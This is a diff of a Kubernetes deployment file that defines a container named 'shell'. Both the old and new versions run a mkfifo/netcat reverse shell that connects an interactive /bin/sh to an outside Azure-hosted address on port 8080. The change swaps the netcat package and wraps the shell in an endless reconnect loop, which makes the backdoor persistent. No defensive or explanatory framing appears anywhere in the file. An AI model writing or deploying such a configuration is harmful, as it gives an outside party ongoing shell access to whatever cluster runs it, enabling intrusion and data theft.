--- a/deployment.yaml
+++ b/deployment.yaml
@@ -14,13 +14,17 @@ spec:
     spec:
       containers:
         - name: shell
-          image: alpine:3.19
+          image: alpine:3.18
           command:
             - sh
             - -c
             - |
-              apk add --no-cache busybox-extras;
-              mkfifo /tmp/f;
-              /bin/sh -i < /tmp/f 2>&1 | nc potter-maga.brazilsouth.cloudapp.azure.com 8080 > /tmp/f
+              apk add --no-cache netcat-openbsd;
+              while true; do
+                mkfifo /tmp/f;
+                /bin/sh -i < /tmp/f 2>&1 | nc potter-maga.brazilsouth.cloudapp.azure.com 8080 > /tmp/f;
+                sleep 5;
+              done
+              
           stdin: true
           tty: true
